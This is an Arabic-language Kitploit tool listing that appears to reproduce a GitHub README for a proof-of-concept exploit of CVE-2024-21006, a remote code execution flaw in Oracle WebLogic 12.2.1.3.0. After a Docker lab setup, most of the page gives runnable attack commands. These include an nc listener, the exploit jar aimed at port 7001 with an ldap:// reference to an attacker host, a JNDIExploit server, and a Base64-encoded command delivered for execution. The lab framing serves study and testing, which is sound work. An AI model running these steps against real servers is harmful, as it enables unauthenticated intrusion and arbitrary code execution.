Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21006_PoC — تنفيذ التعليمات البرمجية عن بُعد (RCE) - Oracle WebLogic 12.2.1.3.0 | Kitploit
أدوات/GitHubGitHub/d3fudd/cve-2024-21006_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubd3fudd/cve-2024-21006_poc

CVE-2024-21006_PoC

تنفيذ التعليمات البرمجية عن بُعد (RCE) - Oracle WebLogic 12.2.1.3.0

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21006 إثبات المفهوم

CVE-2024-21006 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على خادم Oracle WebLogic. يرتبط الخلل بالاستخدام غير الآمن لبروتوكول IIOP و JNDI، مما يسمح لمهاجم عن بُعد غير مصادق بتنفيذ كود تعسفي على الخادم المتأثر، عبر مرجع JNDI ضار.

نشر المعمل

قم بإعداد البيئة:

root@kitploit:~
docker-compose up -d

للوصول إلى شل Kali:

root@kitploit:~
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash

للوصول إلى شل WebLogic:

root@kitploit:~
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash

للوصول إلى شل ExploitBox:

root@kitploit:~
docker exec -it exploitbox /bin/bash

في هذه المرحلة، لدينا مثيل من WebLogic 12.2.1.3.0 قيد التشغيل محليًا: http://127.0.0.1:7001/console/login/LoginForm.jsp

استكشاف المعمل

إثبات مفهوم بسيط:

في Kali:

root@kitploit:~
nc -vnlp 1389

في ExploitBox:

root@kitploit:~
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 ldap://<IP do Kali>:1389

لاحظ أن Kali استقبل الاتصال القادم من WebLogic:

الحصول على RCE:

في Kali، قم بتشغيل JNDIExploit:

root@kitploit:~
cd /exploit
root@kitploit:~
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP do Kali>

في ExploitBox، قم بتنفيذ الـ exploit:

root@kitploit:~
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 "ldap://<IP do Kali>:1389/Basic/Command/Base64/<Comando em Base64>"

في Kali، لاحظ أننا تلقينا الطلب:

في WebLogic، لاحظ أن الأمر تم تنفيذه وتم إنشاء الملف بنجاح:

المراجع:

  • https://github.com/lightr3d/CVE-2024-21006_jar
  • https://github.com/momika233/CVE-2024-21006
  • https://blog.csdn.net/zwy15288408160/article/details/138189146
  • https://blog.csdn.net/m0_46109609/article/details/114373594
تنزيل الأداة